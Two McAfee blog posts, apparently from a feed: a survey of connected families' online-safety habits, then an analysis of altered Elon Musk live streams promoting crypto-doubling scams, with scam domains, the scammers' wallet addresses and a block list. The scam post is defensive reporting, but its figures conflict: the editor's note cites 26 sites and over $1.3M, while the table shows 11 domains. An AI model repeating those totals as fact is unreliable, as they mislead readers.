In December 2021 we conducted a study about beliefs and behaviors about life online among members of connected families—as individuals and as a family unit. Parents and children were surveyed together, with parents answering first and then bringing their children in to consent and answer, leading to findings that represent connected families across 10 different nations.

Through this study, we uncovered universal beliefs about online protection, along with several nuances, all of which pinpointed several tensions between parents and children when it comes to staying safe while enjoying life online.

Four broader topics presented themselves through this study, with each topic presenting several follow-on findings. Here, we’ll take a look at each topic and touch on a few of the several findings found within each, followed by a link where you can download the full report with its complete set of insights and trends.

Topic One: Mobile Maturity

While our tweens and tweens seem to grow into adults right before our eyes, their lives online mature into adulthood as well—thanks in large part to their mobile devices.

Our study found that children between 15 and 16 years old see their mobile usage jump significantly, so much so that it approaches levels that they will carry into adulthood. Yet their connected lives start much earlier, with smartphones and mobile devices leading the way online. The result is that most tweens and young teens today have access to the expansive internet in the palm of their hand, which exposes them to the broader internet full of apps, chats, entertainment, and social media—along with the benefits and risks nearly right away.

As far as the risks are concerned, tweens and young teens reported on their experience with cyberbullying, account theft, and unauthorized use of their personal data. Here it appears that several children were exposed to these risks at an early age.

While these experiences start early with 10–14-year-olds, exposure to online risks only increase as teens get older. By age 17 to 18, reports of cyberbullying increase to 18%, attempted theft of an online account to 16%, and unauthorized use of personal data to 14%.

Topic Two: Parents as Safekeepers

As far as life online is concerned, children look to their parents to keep them safe. While parents accept that role, our study found that they appear to have difficulty in following through.

Children said that their parents are best suited to teach them about being safe online, making them the clear winners across all categories. Nearly three-quarters of children pointed to parents, nearly twice than teachers at school (39%) and more than twice over for online resources (34%).

Looking at the reasons for that response more closely, 63% tweens and teens worldwide felt that their parents know enough to protect their security and privacy. This figure was higher for younger children (65%) and then decreased as they reached their late teens (55%). As noted earlier, an increasing number of children in their late teens have experienced online risks at this point, perhaps leading to less confidence that their parents indeed have the knowledge to keep them safe.

Parents recognize their role as protectors online, just as they recognize their responsibility to protect their children in the broader world. An overwhelming 90% of parents worldwide agreed with this sentiment. Like their children, parents felt that teachers at school played a role as well at 36%. However, their second top response was internet providers, weighing in at 41%.

Yet while parents say they view themselves as protectors, there’s a gap between intent and effort. On PCs and laptops, parents reported the online protection measures they took for themselves, which appear relatively low given the availability and ease of use with such measures—like installing antivirus software (68%), protecting the computer with a password (58%), or sticking to reputable online stores when shopping (50%).

These figures drop yet lower when asked if they took similar precautions for their children. Thus, as parents protect themselves at a low rate, they protect their children at a rate that’s yet even lower.

Moreover, when it came to protection on smartphones, the numbers were similarly low, and often lower than the rate of protection on PCs and laptops. For example, while 56% of parents said that they protect their smartphone with a password or passcode, only 42% said they do the same for their child’s smartphone—a further 14% drop.

Topic Three: The Secret Lives of Tweens and Teens Online

It’s no secret that teens and tweens may hide their activities online. In fact, they’ve said as much.

Our research found that more than half of children (59%) take some action to hide what they’re up to online. When asked for details, tweens and teens mentioned the following:

  • Clearing the browser history, 26%.
  • Close/minimize browser when parent walked in, 21%.
  • Hide or delete IMs or videos, 15%.
  • Browse with incognito mode, 15%.
  • Lie or omit details about online activities, 15%.
  • Use a device their parents don’t check, 10%.

As children grow older, these privacy-keeping activities only increase, particularly when it comes to clearing browser history and using incognito mode in their browser.

Likewise, it appears that it’s no secret children are speaking privately with people they don’t know online. When asked if they believe their children are having conversations without knowing a person’s real identity, 34% of parents said yes. As for children, 37% said yes, marking a 3% difference in awareness between parents and children.

Broken down by age bracket, 36% of children from ages 10 to 14 say they’re having these conversations, which jumps up to 41% at ages 15 to 16. Later, from ages 17 to 18, that figure drops to 39%.

Topic Four: Gendered Protection Bias

Parents in our study said that they take different measures for boys and girls when it comes to protecting them online. An apparent gender bias finds girls more protected than boys, yet it is boys who encounter more issues online.

Keeping tabs of a child’s safety online takes many forms, some involving apps and software on a child’s device, others that require parents to take a more active hand.

As for safety on devices, parental controls software provides one method for monitoring online activity, with features that keep an eye on children’s activity, limit screen time, and that block and filter certain apps and websites.

Parental controls software appears to remain a popular option. On PCs and laptops, 33% of parents reported using it. On mobile devices, the figure held at 33% as well.

Further, parents said that they relied on other approaches to help keep their children safe, citing several other ways they oversee their children’s time online. For example, in the case of monitoring activity on their child’s mobile device, parents say they will:

  • Limit the time of day or length of time when the child has screen time, 59%.
  • Check the websites or apps the child visits or uses, 56%.
  • Look at call records or text messages on a smartphone the child uses, 40%.
  • Friend or follow the child on social media sites, 35%.
  • Track the child’s location through GPS apps or software, 30%.

However, accounting for age and gender, differences in the use of parental controls arise. Girls in their tweens and early teens see more protection from parental controls software than boys do.

For example, girls 10-14 were more likely than boys of the same age to have parental controls on PCs on laptops in every country surveyed (except Canada), and on mobile in every country (except Germany).

This trend extends to several of the more hands-on approaches, with girls seeing them applied more often than boys. For example, in the U.S.:

  • 47% of parents say they will check the browsing and email history on the PCs of their daughters aged 10 to 14. For boys of the same age, that figure is far lower at 33%.
  • The numbers for mobile devices were also similar, with reported checks for girls at 48% and for boys at 35%.

Based on reports from boys, they are more likely to experience a range of online threats more frequently than girls do—with issues ranging from attempted account theft, a financial information leak, and unauthorized use of their personal data.

Meanwhile, it is girls who are adopting online activities at a rate much faster than boys, at least on mobile. Girls aged 10 to 14 tend to stream music, use social media, and go online shopping more than boys their age.

In all, girls report that they are reaping the benefits of online life earlier than boys and with relatively fewer security issues. Meanwhile, for boys, that equation is flipped. Their online lives mature more slowly, yet they find themselves experiencing security issues more often.

Further findings

We’ve seen just how young children are when they reach maturity, at least in terms of their lives online.
By their mid-teens, they’re using computers, laptops, and smartphones at rates that will carry into adulthood. With that, they’re already experiencing some of the risks and issues that adults do, such as attempted account theft, improper use of data, and leaks of financial information.

These represent a few of the many insights and trends found in our complete report on connected families. Others include noteworthy differences across nations, such as which nations report the highest levels of cyberbullying and which nation has nearly 100% of its young children saying they use a smartphone regularly. Yet more findings reveal insights into screen time, video game usage, and a breakdown of the top online activities for teens—and many more ways families are growing up together through their lives online.

Click here for a full copy of the report.

Survey Methodology

In December 2021 McAfee LLC conducted a study about beliefs and behaviors around digital participation and online protection among members of connected families—as individuals and as a family unit.

Global survey of parents and children, with children answering alongside their parents.

Parents and children were surveyed together, with parents answering first and then bringing their children in to consent and answer.
These findings represent connected families not collections of individuals.

The post Life Behind the Screens of Parents, Tweens, and Teens: McAfee’s Connected Family Study appeared first on McAfee Blog.

Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

By McAfee Labs

By Oliver Devane 

Editors note: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

 

 

We identified several different streams occurring at a similar same time. The images of some are shown below: 

 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 

 

The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

❌